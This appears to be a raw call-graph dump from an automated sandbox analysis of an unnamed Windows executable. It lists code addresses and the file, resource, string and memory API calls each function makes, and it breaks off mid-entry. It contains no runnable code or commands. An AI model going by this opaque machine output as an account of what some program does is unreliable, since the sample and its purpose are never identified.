_wcsicmp 40041->40099 40043 40bc46 40043->40038 40044 40bc61 memset memset WideCharToMultiByte 40043->40044 40100 40103c strlen 40044->40100 40046 40bcc0 40047 40b273 27 API calls 40046->40047 40048 40bcd0 memcmp 40047->40048 40048->40038 40049 40bce2 40048->40049 40050 404423 37 API calls 40049->40050 40051 40bd10 40050->40051 40051->40038 40052 40bd3a LocalFree 40051->40052 40053 40bd1f memcpy 40051->40053 40052->40038 40053->40052 40054->39290 40056 409a74 GetTempFileNameW 40055->40056 40057 409a66 GetWindowsDirectoryW 40055->40057 40056->39287 40057->40056 40058->39328 40059->39328 40060->39328 40061->39328 40062->39328 40063->39328 40064->39328 40065->39328 40066->39328 40067->39303 40068->39325 40101 4096c3 CreateFileW 40069->40101 40071 40cc34 40072 40cc3d GetFileSize 40071->40072 40073 40bbca 40071->40073 40074 40afcf 2 API calls 40072->40074 40073->40025 40081 40cf04 40073->40081 40075 40cc64 40074->40075 40102 40a2ef ReadFile 40075->40102 40077 40cc71 40103 40ab4a MultiByteToWideChar 40077->40103 40079 40cc95 CloseHandle 40080 40b04b ??3@YAXPAX 40079->40080 40080->40073 40082 40b633 free 40081->40082 40083 40cf14 40082->40083 40109 40b1ab free free 40083->40109 40085 40bbdd 40085->40025 40085->40030 40086 40cf1b 40086->40085 40088 40cfef 40086->40088 40110 40cd4b 40086->40110 40089 40cd4b 14 API calls 40088->40089 40089->40085 40091 40b633 free 40090->40091 40092 40cc15 40091->40092 40093 40aa04 free 40092->40093 40094 40cc1d 40093->40094 40159 40b1ab free free 40094->40159 40096 40b7d4 memset CreateFileW 40096->39282 40096->39283 40097->40033 40098->40035 40099->40043 40100->40046 40101->40071 40102->40077 40104 40ab6b 40103->40104 40108 40ab93 40103->40108 40105 40a9ce 4 API calls 40104->40105 40106 40ab74 40105->40106 40107 40ab7c MultiByteToWideChar 40106->40107 40107->40108 40108->40079 40109->40086 40111 40cd7b 40110->40111 40144 40aa29 40111->40144 40113 40cef5 40114 40aa04 free 40113->40114 40115 40cefd 40114->40115 40115->40086 40117 40aa29 6 API calls 40118 40ce1d 40117->40118 40119 40aa29 6 API calls 40118->40119 40120 40ce3e 40119->40120 40121 40ce6a 40120->40121 40152 40abb7 wcslen memmove 40120->40152 40122 40ce9f 40121->40122 40155 40abb7 wcslen memmove 40121->40155 40124 40a8d0 7 API calls 40122->40124 40127 40ceb5 40124->40127 40125 40ce56 40153 40aa71 wcslen 40125->40153 40134 40a8d0 7 API calls 40127->40134 40129 40ce8b 40156 40aa71 wcslen 40129->40156 40130 40ce5e 40154 40abb7 wcslen memmove 40130->40154 40132 40ce93 40157 40abb7 wcslen memmove 40132->40157 40136 40cecb 40134->40136 40158 40d00b malloc memcpy free free 40136->40158 40138 40cedd 40139 40aa04 free 40138->40139 40140 40cee5 40139->40140 40141 40aa04 free 40140->40141 40142 40ceed 40141->40142 40143 40aa04 free 40142->40143 40143->40113 40145 40aa33 40144->40145 40151 40aa63 40144->40151 40146 40aa44 40145->40146 40147 40aa38 wcslen 40145->40147 40148 40a9ce malloc memcpy free free 40146->40148 40147->40146 40149 40aa4d 40148->40149 40150 40aa51 memcpy 40149->40150 40149->40151 40150->40151 40151->40113 40151->40117 40152->40125 40153->40130 40154->40121 40155->40129 40156->40132 40157->40122 40158->40138 40159->40096 40160->39344 40161->39351 37536 44dea5 37537 44deb5 FreeLibrary 37536->37537 37538 44dec3 37536->37538 37537->37538 40171 4148b6 FindResourceW 40172 4148f9 40171->40172 40173 4148cf SizeofResource 40171->40173 40173->40172 40174 4148e0 LoadResource 40173->40174 40174->40172 40175 4148ee LockResource 40174->40175 40175->40172 37712 415304 free 40176 441b3f 40186 43a9f6 40176->40186 40178 441b61 40359 4386af memset 40178->40359 40180 44189a 40181 442bd4 40180->40181 40182 4418e2 40180->40182 40183 4418ea 40181->40183 40361 441409 memset 40181->40361 40182->40183 40360 4414a9 12 API calls 40182->40360 40187 43aa20 40186->40187 40188 43aadf 40186->40188 40187->40188 40189 43aa34 memset 40187->40189 40188->40178 40190 43aa56 40189->40190 40191 43aa4d 40189->40191 40362 43a6e7 40190->40362 40370 42c02e memset 40191->40370 40196 43aad3 40372 4169a7 11 API calls 40196->40372 40197 43aaae 40197->40188 40197->40196 40212 43aae5 40197->40212 40198 43ac18 40201 43ac47 40198->40201 40374 42bbd5 memcpy memcpy memcpy memset memcpy 40198->40374 40202 43aca8 40201->40202 40375 438eed 16 API calls 40201->40375 40205 43acd5 40202->40205 40377 4233ae 11 API calls 40202->40377 40378 423426 11 API calls 40205->40378 40206 43ac87 40376 4233c5 16 API calls 40206->40376 40210 43ace1 40379 439811 163 API calls 40210->40379 40211 43a9f6 161 API calls 40211->40212 40212->40188 40212->40198 40212->40211 40373 439bbb 22 API calls 40212->40373 40214 43acfd 40219 43ad2c 40214->40219 40380 438eed 16 API calls 40214->40380 40216 43ad19 40381 4233c5 16 API calls 40216->40381 40217 43ad58 40382 44081d 163 API calls 40217->40382 40219->40217 40223 43add9 40219->40223 40222 43ae3a memset 40224 43ae73 40222->40224 40223->40223 40386 423426 11 API calls 40223->40386 40387 42e1c0 147 API calls 40224->40387 40225 43adab 40384 438c4e 163 API calls 40225->40384 40228 43ad6c 40228->40188 40228->40225 40383 42370b memset memcpy memset 40228->40383 40230 43adcc 40385 440f84 12 API calls 40230->40385 40231 43ae96 40388 42e1c0 147 API calls 40231->40388 40234 43aea8 40235 43aec1 40234->40235 40389 42e199 147 API calls 40234->40389 40236 43af00 40235->40236 40390 42e1c0 147 API calls 40235->40390 40236->40188 40240 43af1a 40236->40240 40241 43b3d9 40236->40241 40391 438eed 16 API calls 40240->40391 40246 43b3f6 40241->40246 40250 43b4c8 40241->40250 40243 43b60f 40243->40188 40450 4393a5 17 API calls 40243->40450 40245 43af2f 40392 4233c5 16 API calls 40245->40392 40432 432878 12 API calls 40246->40432 40248 43af51 40393 423426 11 API calls 40248->40393 40258 43b4f2 40250->40258 40438 42bbd5 memcpy memcpy memcpy memset memcpy 40250->40438 40252 43af7d 40394 423426 11 API calls 40252->40394 40256 43b529 40440 44081d 163 API calls 40256->40440 40257 43af94 40395 423330 11 API calls 40257->40395 40439 43a76c 21 API calls 40258->40439 40262 43afca 40396 423330 11 API calls 40262->40396 40263 43b47e 40266 43b497 40263->40266 40435 42374a memcpy memset memcpy memcpy memcpy 40263->40435 40264 43b544 40267 43b55c 40264->40267 40441 42c02e memset 40264->40441 40436 4233ae 11 API calls 40266->40436 40442 43a87a 163 API calls 40267->40442 40268 43afdb 40397 4233ae 11 API calls 40268->40397 40273 43b428 40284 43b462 40273->40284 40433 432b60 16 API calls 40273->40433 40275 43b56c 40278 43b58a 40275->40278 40443 423330 11 API calls 40275->40443 40276 43b4b1 40437 423399 11 API calls 40276->40437 40277 43afee 40398 44081d 163 API calls 40277->40398 40444 440f84 12 API calls 40278->40444 40280 43b4c1 40446 42db80 163 API calls 40280->40446 40434 423330 11 API calls 40284->40434 40286 43b592 40445 43a82f 16 API calls 40286->40445 40289 43b5b4 40447 438c4e 163 API calls 40289->40447 40291 43b5cf 40448 42c02e memset 40291->40448 40293 43b005 40293->40188 40297 43b01f 40293->40297 40399 42d836 163 API calls 40293->40399 40294 43b1ef 40409 4233c5 16 API calls 40294->40409 40297->40294 40407 423330 11 API calls 40297->40407 40408 42d71d 163 API calls 40297->40408 40298 43b212 40410 423330 11 API calls 40298->40410 40299 43b087 40400 4233ae 11 API calls 40299->40400 40300 43add4 40300->40243 40449 438f86 16 API calls 40300->40449 40304 43b22a 40411 42ccb5 11 API calls 40304->40411 40307 43b23f 40412 4233ae 11 API calls 40307->40412 40308 43b10f 40403 423330 11 API calls 40308->40403 40310 43b257 40413 4233ae 11 API calls 40310->40413 40314 43b129 40404 4233ae 11 API calls 40314->40404 40315 43b26e 40414 4233ae 11 API calls 40315->40414 40318 43b09a 40318->40308 40401 42cc15 19 API calls 40318->40401 40402 4233ae 11 API calls 40318->40402 40319 43b282 40415 43a87a 163 API calls 40319->40415 40321 43b13c 40405 440f84 12 API calls 40321->40405 40323 43b29d 40416 423330 11 API calls 40323->40416 40326 43b15f 40406 4233ae 11 API calls 40326->40406 40327 43b2af 40329 43b2b8 40327->40329 40330 43b2ce 40327->40330 40417 4233ae 11 API calls 40329->40417 40418 440f84 12 API calls 40330->40418 40333 43b2c9 40420 4233ae 11 API calls 40333->40420 40334 43b2da 40419 42370b memset memcpy memset 40334->40419 40337 43b2f9 40421 423330 11 API calls 40337->40421 40339 43b30b 40422 423330 11 API calls 40339->40422 40341 43b325 40423 423399 11 API calls 40341->40423 40343 43b332 40424 4233ae 11 API calls 40343->40424 40345 43b354 40425 423399 11 API calls 40345->40425 40347 43b364 40426 43a82f 16 API calls 40347->40426 40349 43b370 40427 42db80 163 API calls 40349->40427 40351 43b380 40428 438c4e 163 API calls 40351->40428 40353 43b39e 40429 423399 11 API calls 40353->40429 40355 43b3ae 40430 43a76c 21 API calls 40355->40430 40357 43b3c3 40431 423399 11 API calls 40357->40431 40359->40180 40360->40183 40361->40181 40363 43a6f5 40362->40363 40369 43a765 40362->40369 40363->40369 40451 42a115 40363->40451 40367 43a73d 40368 42a115 147 API calls 40367->40368 40367->40369 40368->40369 40369->40188 40371 4397fd memset 40369->40371 40370->40190 40371->40197 40372->40188 40373->40212 40374->40201 40375->40206 40376->40202 40377->40205 40378->40210 40379->40214 40380->40216 40381->40219 40382->40228 40383->40225 40384->40230 40385->40300 40386->40222 40387->40231 40388->40234 40389->40235 40390->40235 40391->40245 40392->40248 40393->40252 40394->40257 40395->40262 40396->40268 40397->40277 40398->40293 40399->40299 40400->40318 40401->40318 40402->40318 40403->40314 40404->40321 40405->40326 40406->40297 40407->40297 40408->40297 40409->40298 40410->40304 40411->40307 40412->40310 40413->40315 40414->40319 40415->40323 40416->40327 40417->40333 40418->40334 40419->40333 40420->40337 40421->40339 40422->40341 40423->40343 40424->40345 40425->40347 40426->40349 40427->40351 40428->40353 40429->40355 40430->40357 40431->40300 40432->40273 40433->40284 40434->40263 40435->40266 40436->40276 40437->40280 40438->40258 40439->40256 40440->40264 40441->40267 40442->40275 40443->40278 40444->40286 40445->40280 40446->40289 40447->40291 40448->40300 40449->40243 40450->40188 40452 42a175 40451->40452 40454 42a122 40451->40454 40452->40369 40457 42b13b 147 API calls 40452->40457 40454->40452 40455 42a115 147 API calls 40454->40455 40458 43a174 40454->40458 40482 42a0a8 147 API calls 40454->40482 40455->40454 40457->40367 40472 43a196 40458->40472 40473 43a19e 40458->40473 40459 43a306 40459->40472 40491 4388c4 14 API calls 40459->40491 40462 42a115 147 API calls 40462->40473 40463 415a91 memset 40463->40473 40464 43a642 40464->40472 40505 4169a7 11 API calls 40464->40505 40466 4165ff 11 API calls 40466->40473 40468 43a635 40504 42c02e memset 40468->40504 40472->40454 40473->40459 40473->40462 40473->40463 40473->40466 40473->40472 40483 42ff8c 40473->40483 40499 439504 13 API calls 40473->40499 40500 4312d0 147 API calls 40473->40500 40501 42be4c memcpy memcpy memcpy memset memcpy 40473->40501 40502 43a121 11 API calls 40473->40502 40475 4169a7 11 API calls 40476 43a325 40475->40476 40476->40464 40476->40468 40476->40472 40476->40475 40477 42b5b5 memset memcpy 40476->40477 40478 42bf4c 14 API calls 40476->40478 40481 4165ff 11 API calls 40476->40481 40492 42b63e 40476->40492 40503 42bfcf memcpy 40476->40503 40477->40476 40478->40476 40481->40476 40482->40454 40484 43817e 139 API calls 40483->40484 40485 42ff99 40484->40485 40486 42ffe3 40485->40486 40487 42ffd0 40485->40487 40490 42ff9d 40485->40490 40507 4169a7 11 API calls 40486->40507 40506 4169a7 11 API calls 40487->40506 40490->40473 40491->40476 40508 42b4ec 40492->40508 40494 42b64c 40514 42b5e4 memset 40494->40514 40496 42b65e 40497 42b66d 40496->40497 40515 42b3c6 11 API calls 40496->40515 40497->40476 40499->40473 40500->40473 40501->40473 40502->40473 40503->40476 40504->40464 40505->40472 40506->40490 40507->40490 40510 42b4ff 40508->40510 40509 415a91 memset 40511 42b52c 40509->40511 40510->40509 40512 42b553 memcpy 40511->40512 40513 42b545 40511->40513 40512->40513 40513->40494 40514->40496 40515->40497 40542 41493c EnumResourceNamesW 37540 4287c1 37541 4287d2 37540->37541 37542 429ac1 37540->37542 37543 428818 37541->37543 37544 42881f 37541->37544 37558 425711 37541->37558 37557 425ad6 37542->37557 37610 415c56 11 API calls 37542->37610 37577 42013a 37543->37577 37605 420244 97 API calls 37544->37605 37549 4260dd 37604 424251 120 API calls 37549->37604 37551 4259da 37603 416760 11 API calls 37551->37603 37556 429a4d 37560 429a66 37556->37560 37561 429a9b 37556->37561 37558->37542 37558->37551 37558->37556 37559 422aeb memset memcpy memcpy 37558->37559 37563 4260a1 37558->37563 37573 4259c2 37558->37573 37576 425a38 37558->37576 37593 4227f0 memset memcpy 37558->37593 37594 422b84 15 API calls 37558->37594 37595 422b5d memset memcpy memcpy 37558->37595 37596 422640 13 API calls 37558->37596 37598 4241fc 11 API calls 37558->37598 37599 42413a 90 API calls 37558->37599 37559->37558 37606 415c56 11 API calls 37560->37606 37565 429a96 37561->37565 37608 416760 11 API calls 37561->37608 37602 415c56 11 API calls 37563->37602 37609 424251 120 API calls 37565->37609 37568 429a7a 37607 416760 11 API calls 37568->37607 37573->37557 37597 415c56 11 API calls 37573->37597 37576->37573 37600 422640 13 API calls 37576->37600 37601 4226e0 12 API calls 37576->37601 37578 42014c 37577->37578 37581 420151 37577->37581 37620 41e466 97 API calls 37578->37620 37580 420162 37580->37558 37581->37580 37582 4201b3 37581->37582 37583 420229 37581->37583 37584 4201b8 37582->37584 37585 4201dc 37582->37585 37583->37580 37586 41fd5e 86 API calls 37583->37586 37611 41fbdb 37584->37611 37585->37580 37589 4201ff 37585->37589 37617 41fc4c 37585->37617 37586->37580 37589->37580 37592 42013a 97 API calls 37589->37592 37592->37580 37593->37558 37594->37558 37595->37558 37596->37558 37597->37551 37598->37558 37599->37558 37600->37576 37601->37576 37602->37551 37603->37549 37604->37557 37605->37558 37606->37568 37607->37565 37608->37565 37609->37542 37610->37551 37612 41fbf8 37611->37612 37615 41fbf1 37611->37615 37625 41ee26 37612->37625 37616 41fc39 37615->37616 37635 4446ce 11 API calls 37615->37635 37616->37580 37621 41fd5e 37616->37621 37618 41ee6b 86 API calls 37617->37618 37619 41fc5d 37618->37619 37619->37585 37620->37581 37623 41fd65 37621->37623 37622 41fdab 37622->37580 37623->37622 37624 41fbdb 86 API calls 37623->37624 37624->37623 37626 41ee41 37625->37626 37627 41ee32 37625->37627 37636 41edad 37626->37636 37639 4446ce 11 API calls 37627->37639 37630 41ee3c 37630->37615 37633 41ee58 37633->37630 37641 41ee6b 37633->37641 37635->37616 37645 41be52 37636->37645 37639->37630 37640 41eb85 11 API calls 37640->37633 37642 41ee70 37641->37642 37643 41ee78 37641->37643 37698 41bf99 86 API calls 37642->37698 37643->37630 37646 41be6f 37645->37646 37647 41be5f 37645->37647 37653 41be8c 37646->37653 37677 418c63 memset memset 37646->37677 37676 4446ce 11 API calls 37647->37676 37650 41bee7 37651 41be69 37650->37651 37681 41a453 86 API calls 37650->37681 37651->37630 37651->37640 37653->37650 37653->37651 37654 41bf3a 37653->37654 37655 41bed1 37653->37655 37680 4446ce 11 API calls 37654->37680 37657 41bef0 37655->37657 37660 41bee2 37655->37660 37657->37650 37658 41bf01 37657->37658 37659 41bf24 memset 37658->37659 37664 41bf14 37658->37664 37678 418a6d memset memcpy memset 37658->37678 37659->37651 37666 41ac13 37660->37666 37679 41a223 memset memcpy memset 37664->37679 37665 41bf20 37665->37659 37667 41ac52 37666->37667 37668 41ac3f memset 37666->37668 37670 41ac6a 37667->37670 37682 41dc14 19 API calls 37667->37682 37673 41acd9 37668->37673 37672 41aca1 37670->37672 37683 41519d 37670->37683 37672->37673 37674 41acc0 memset 37672->37674 37675 41accd memcpy 37672->37675 37673->37650 37674->37673 37675->37673 37676->37651 37677->37653 37678->37664 37679->37665 37680->37650 37682->37670 37686 4175ed 37683->37686 37694 417570 SetFilePointer 37686->37694 37689 41760a ReadFile 37690 417637 37689->37690 37691 417627 GetLastError 37689->37691 37692 41763e memset 37690->37692 37693 4151b3 37690->37693 37691->37693 37692->37693 37693->37672 37695 4175b2 37694->37695 37696 41759c GetLastError 37694->37696 37695->37689 37695->37693 37696->37695 37697 4175a8 GetLastError 37696->37697 37697->37695 37698->37643 37699 417bc5 37700 417c61 37699->37700 37701 417bda 37699->37701 37701->37700 37702 417bf6 UnmapViewOfFile CloseHandle 37701->37702 37704 417c2c 37701->37704 37706 4175b7 37701->37706 37702->37701 37702->37702 37704->37701 37711 41851e 20 API calls 37704->37711 37707 4175d6 CloseHandle 37706->37707 37708 4175c8 37707->37708 37709 4175df 37707->37709 37708->37709 37710 4175ce Sleep 37708->37710 37709->37701 37710->37707 37711->37704 37718 4415ea 37726 4304b2 37718->37726 37720 4415fe 37721 4418ea 37720->37721 37722 442bd4 37720->37722 37723 4418e2 37720->37723 37722->37721 37774 441409 memset 37722->37774 37723->37721 37773 4414a9 12 API calls 37723->37773 37775 43041c 12 API calls 37726->37775 37728 4304cd 37733 430557 37728->37733 37776 43034a 37728->37776 37730 4304f3 37730->37733 37780 430468 11 API calls 37730->37780 37732 430506 37732->37733 37734 43057b 37732->37734 37781 43817e 37732->37781 37733->37720 37786 415a91 37734->37786 37739 4305e4 37739->37733 37791 4328e4 12 API calls 37739->37791 37741 43052d 37741->37733 37741->37734 37744 430542 37741->37744 37743 4305fa 37745 430609 37743->37745 37792 423383 11 API calls 37743->37792 37744->37733 37785 4169a7 11 API calls 37744->37785 37793 423330 11 API calls 37745->37793 37748 430634 37794 423399 11 API calls 37748->37794 37750 430648 37795 4233ae 11 API calls 37750->37795 37752 43066b 37796 423330 11 API calls 37752->37796 37754 43067d 37797 4233ae 11 API calls 37754->37797 37756 430695 37798 423330 11 API calls 37756->37798 37758 4306d6 37800 423330 11 API calls 37758->37800 37759 4306a7 37759->37758 37760 4306c0 37759->37760 37799 4233ae 11 API calls 37760->37799 37763 4306d1 37801 430369 17 API calls 37763->37801 37765 4306f3 37802 423330 11 API calls 37765->37802 37767 430704 37803 423330 11 API calls 37767->37803 37769 430710 37804 423330 11 API calls 37769->37804 37771 43071e 37805 423383 11 API calls 37771->37805 37773->37721 37774->37722 37775->37728 37777 43034e 37776->37777 37779 430359 37776->37779 37806 415c23 memcpy 37777->37806 37779->37730 37780->37732 37782 438187 37781->37782 37784 438192 37781->37784 37807 4380f6 37782->37807 37784->37741 37785->37733 37787 415a9d 37786->37787 37788 415ab3 37787->37788 37789 415aa4 memset 37787->37789 37788->37733 37790 4397fd memset 37788->37790 37789->37788 37790->37739 37791->37743 37792->37745 37793->37748 37794->37750 37795->37752 37796->37754 37797->37756 37798->37759 37799->37763 37800->37763 37801->37765 37802->37767 37803->37769 37804->37771 37805->37733 37806->37779 37809 43811f 37807->37809 37808 438164 37808->37784 37809->37808 37812 437e5e 37809->37812 37835 4300e8 memset memset memcpy 37809->37835 37836 437d3c 37812->37836 37814 437eb3 37814->37809 37815 437ea9 37815->37814 37820 437f22 37815->37820 37851 41f432 37815->37851 37818 437f06 37901 415c56 11 API calls 37818->37901 37822 437f7f 37820->37822 37902 432d4e 37820->37902 37821 437f95 37906 415c56 11 API calls 37821->37906 37822->37821 37824 43802b 37822->37824 37862 4165ff 37824->37862 37826 437fa3 37826->37814 37909 41f638 104 API calls 37826->37909 37831 43806b 37833 438094 37831->37833 37907 42f50e 138 API calls 37831->37907 37833->37826 37908 4300e8 memset memset memcpy 37833->37908 37835->37809 37837 437d69 37836->37837 37840 437d80 37836->37840 37922 437ccb 11 API calls 37837->37922 37839 437d76 37839->37815 37840->37839 37841 437da3 37840->37841 37843 437d90 37840->37843 37910 438460 37841->37910 37843->37839 37926 437ccb 11 API calls 37843->37926 37845 437de8 37925 424f26 123 API calls 37845->37925 37847 437dcb 37847->37845 37923 444283 13 API calls 37847->37923 37849 437dfc 37924 437ccb 11 API calls 37849->37924 37852 41f54d 37851->37852 37856 41f44f 37851->37856 37853 41f466 37852->37853 38097 41c635 memset memset 37852->38097 37853->37818 37853->37820 37856->37853 37860 41f50b 37856->37860 38068 41f1a5 37856->38068 38093 41c06f memcmp 37856->38093 38094 41f3b1 90 API calls 37856->38094 38095 41f398 86 API calls 37856->38095 37860->37852 37860->37853 38096 41c295 86 API calls 37860->38096 37863 4165a0 11 API calls 37862->37863 37864 41660d 37863->37864 37865 437371 37864->37865 37866 41703f 11 API calls 37865->37866 37867 437399 37866->37867 37868 43739d 37867->37868 37870 4373ac 37867->37870 38202 4446ea 11 API calls 37868->38202 37871 416935 16 API calls 37870->37871 37887 4373ca 37871->37887 37872 437584 37874 4375bc 37872->37874 38209 42453e 123 API calls 37872->38209 37873 438460 134 API calls 37873->37887 37876 415c7d 16 API calls 37874->37876 37877 4375d2 37876->37877 37881 4373a7 37877->37881 38210 4442e6 37877->38210 37880 4375e2 37880->37881 38217 444283 13 API calls 37880->38217 37881->37831 37883 415a91 memset 37883->37887 37886 43758f 38208 42453e 123 API calls 37886->38208 37887->37872 37887->37873 37887->37883 37887->37886 37900 437d3c 135 API calls 37887->37900 38184 4251c4 37887->38184 38203 425433 13 API calls 37887->38203 38204 425413 17 API calls 37887->38204 38205 42533e 16 API calls 37887->38205 38206 42538f 16 API calls 37887->38206 38207 42453e 123 API calls 37887->38207 37890 4375f4 37894 437620 37890->37894 37895 43760b 37890->37895 37892 43759f 37893 416935 16 API calls 37892->37893 37893->37872 37896 416935 16 API calls 37894->37896 38218 444283 13 API calls 37895->38218 37896->37881 37899 437612 memcpy 37899->37881 37900->37887 37901->37814 37903 432d65 37902->37903 37904 432d58 37902->37904 37903->37822 38293 432cc4 memset memset memcpy 37904->38293 37906->37826 37907->37833 37908->37826 37909->37814 37927 41703f 37910->37927 37912 43847a 37913 43848a 37912->37913 37914 43847e 37912->37914 37934 438270 37913->37934 37964 4446ea 11 API calls 37914->37964 37918 438488 37918->37847 37920 4384bb 37921 438270 134 API calls 37920->37921 37921->37918 37922->37839 37923->37849 37924->37845 37925->37839 37926->37839 37928 417044 37927->37928 37929 41705c 37927->37929 37933 417055 37928->37933 37966 416760 11 API calls 37928->37966 37930 417075 37929->37930 37967 41707a 11 API calls 37929->37967 37930->37912 37933->37912 37935 415a91 memset 37934->37935 37936 43828d 37935->37936 37937 438297 37936->37937 37938 438341 37936->37938 37940 4382d6 37936->37940 37939 415c7d 16 API calls 37937->37939 37968 44358f 37938->37968 37942 438458 37939->37942 37943 4382fb 37940->37943 37944 4382db 37940->37944 37942->37918 37965 424f26 123 API calls 37942->37965 38011 415c23 memcpy 37943->38011 37999 416935 37944->37999 37947 438305 37951 44358f 19 API calls 37947->37951 37953 438318 37947->37953 37948 4382e9 38007 415c7d 37948->38007 37950 438373 37956 438383 37950->37956 38012 4300e8 memset memset memcpy 37950->38012 37951->37953 37953->37950 37994 43819e 37953->37994 37955 4383cd 37957 4383f5 37955->37957 38014 42453e 123 API calls 37955->38014 37956->37955 38013 415c23 memcpy 37956->38013 37960 438404 37957->37960 37961 43841c 37957->37961 37963 416935 16 API calls 37960->37963 37962 416935 16 API calls 37961->37962 37962->37937 37963->37937 37964->37918 37965->37920 37966->37933 37967->37928 37969 4435be 37968->37969 37970 44360c 37969->37970 37972 443676 37969->37972 37975 4436ce 37969->37975 37979 44366c 37969->37979 38015 442ff8 37969->38015 37970->37953 37971 443758 37984 443775 37971->37984 38024 441409 memset 37971->38024 37972->37971 37974 443737 37972->37974 37976 442ff8 19 API calls 37972->37976 37977 442ff8 19 API calls 37974->37977 37981 4165ff 11 API calls 37975->37981 37976->37974 37977->37971 38023 4169a7 11 API calls 37979->38023 37980 4437be 37985 4437de 37980->37985 38026 416760 11 API calls 37980->38026 37981->37972 37984->37980 38025 415c56 11 API calls 37984->38025 37988 443801 37985->37988 38027 42463b memset memcpy 37985->38027 37987 443826 38029 43bd08 memset 37987->38029 37988->37987 38028 43024d memset 37988->38028 37992 443837 37992->37970 38030 43024d memset 37992->38030 37995 438246 37994->37995 37997 4381ba 37994->37997 37995->37950 37996 41f432 110 API calls 37996->37997 37997->37995 37997->37996 38046 41f638 104 API calls 37997->38046 38000 41693e 37999->38000 38003 41698e 37999->38003 38001 41694c 38000->38001 38047 422fd1 memset 38000->38047 38001->38003 38048 4165a0 38001->38048 38003->37948 38008 415c81 38007->38008 38009 415c9c 38007->38009 38008->38009 38010 416935 16 API calls 38008->38010 38009->37937 38010->38009 38011->37947 38012->37956 38013->37955 38014->37957 38016 442ffe 38015->38016 38017 443094 38016->38017 38021 443092 38016->38021 38031 4414ff 38016->38031 38043 4169a7 11 API calls 38016->38043 38044 441325 memset 38016->38044 38045 4414a9 12 API calls 38017->38045 38021->37969 38023->37972 38024->37971 38025->37980 38026->37985 38027->37988 38028->37987 38029->37992 38030->37992 38032 441539 38031->38032 38033 441547 38031->38033 38032->38033 38034 441575 38032->38034 38035 441582 38032->38035 38036 4418e2 38033->38036 38042 442bd4 38033->38042 38038 42fccf 18 API calls 38034->38038 38037 43275a 12 API calls 38035->38037 38039 4414a9 12 API calls 38036->38039 38040 4418ea 38036->38040 38037->38033 38038->38033 38039->38040 38040->38016 38041 441409 memset 38041->38042 38042->38040 38042->38041 38043->38016 38044->38016 38045->38021 38046->37997 38047->38001 38054 415cfe 38048->38054 38053 422b84 15 API calls 38053->38003 38055 41628e 38054->38055 38060 415d23 __aullrem __aulldvrm 38054->38060 38062 416520 38055->38062 38056 4163ca 38057 416422 10 API calls 38056->38057 38057->38055 38058 416422 10 API calls 38058->38060 38059 416172 memset 38059->38060 38060->38055 38060->38056 38060->38058 38060->38059 38061 415cb9 10 API calls 38060->38061 38061->38060 38063 416527 38062->38063 38067 416574 38062->38067 38064 415700 10 API calls 38063->38064 38065 416544 38063->38065 38063->38067 38064->38065 38066 416561 memcpy 38065->38066 38065->38067 38066->38067 38067->38003 38067->38053 38098 41bc3b 38068->38098 38071 41edad 86 API calls 38072 41f1cb 38071->38072 38073 41f1f5 memcmp 38072->38073 38074 41f20e 38072->38074 38078 41f282 38072->38078 38073->38074 38075 41f21b memcmp 38074->38075 38074->38078 38076 41f326 38075->38076 38079 41f23d 38075->38079 38077 41ee6b 86 API calls 38076->38077 38076->38078 38077->38078 38078->37856 38079->38076 38080 41f28e memcmp 38079->38080 38122 41c8df 56 API calls 38079->38122 38080->38076 38081 41f2a9 38080->38081 38081->38076 38084 41f308 38081->38084 38085 41f2d8 38081->38085 38083 41f269 38083->38076 38086 41f287 38083->38086 38087 41f27a 38083->38087 38084->38076 38124 4446ce 11 API calls 38084->38124 38088 41ee6b 86 API calls 38085->38088 38086->38080 38089 41ee6b 86 API calls 38087->38089 38090 41f2e0 38088->38090 38089->38078 38123 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38090->38123 38093->37856 38094->37856 38095->37856 38096->37852 38097->37853 38100 41bc54 38098->38100 38107 41be0b 38098->38107 38103 41bd61 38100->38103 38100->38107 38111 41bc8d 38100->38111 38125 41baf0 55 API calls 38100->38125 38102 41be45 38102->38071 38102->38078 38103->38102 38134 41a25f memset 38103->38134 38105 41be04 38132 41aee4 56 API calls 38105->38132 38107->38103 38133 41ae17 34 API calls 38107->38133 38108 41bd42 38108->38103 38108->38105 38109 41bdd8 memset 38108->38109 38110 41bdba 38108->38110 38112 41bde7 memcmp 38109->38112 38121 4175ed 6 API calls 38110->38121 38111->38103 38111->38108 38113 41bd18 38111->38113 38126 4151e3 38111->38126 38112->38105 38115 41bdfd 38112->38115 38113->38103 38113->38108 38130 41a9da 86 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 38113->38130 38114 41bdcc 38114->38103 38114->38112 38131 41a1b0 memset 38115->38131 38121->38114 38122->38083 38123->38078 38124->38076 38125->38111 38135 41837f 38126->38135 38129 444706 11 API calls 38129->38113 38130->38108 38131->38105 38132->38107 38133->38103 38134->38102 38136 4183c1 38135->38136 38139 4183ca 38135->38139 38182 418197 25 API calls 38136->38182 38140 4151f9 38139->38140 38156 418160 38139->38156 38140->38113 38140->38129 38141 4183e5 38141->38140 38165 41739b 38141->38165 38144 418444 CreateFileW 38146 418477 38144->38146 38145 41845f CreateFileA 38145->38146 38147 4184c2 memset 38146->38147 38148 41847e GetLastError free 38146->38148 38168 418758 38147->38168 38149 4184b5 38148->38149 38150 418497 38148->38150 38183 444706 11 API calls 38149->38183 38152 41837f 49 API calls 38150->38152 38152->38140 38157 41739b GetVersionExW 38156->38157 38158 418165 38157->38158 38160 4173e4 MultiByteToWideChar malloc MultiByteToWideChar free 38158->38160 38161 418178 38160->38161 38162 41817f 38161->38162 38163 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte free 38161->38163 38162->38141 38164 418188 free 38163->38164 38164->38141 38166 4173d6 38165->38166 38167 4173ad GetVersionExW 38165->38167 38166->38144 38166->38145 38167->38166 38169 418680 43 API calls 38168->38169 38170 418782 38169->38170 38171 418160 11 API calls 38170->38171 38173 418506 free 38170->38173 38172 418799 38171->38172 38172->38173 38174 41739b GetVersionExW 38172->38174 38173->38140 38175 4187a7 38174->38175 38176 4187da 38175->38176 38177 4187ad GetDiskFreeSpaceW 38175->38177 38179 4187ec GetDiskFreeSpaceA 38176->38179 38181 4187e8 38176->38181 38180 418800 free 38177->38180 38179->38180 38180->38173 38181->38179 38182->38139 38183->38140 38219 424f07 38184->38219 38186 4251e4 38187 4251f7 38186->38187 38188 4251e8 38186->38188 38227 4250f8 38187->38227 38226 4446ea 11 API calls 38188->38226 38190 4251f2 38190->37887 38192 425209 38195 425249 38192->38195 38198 4250f8 127 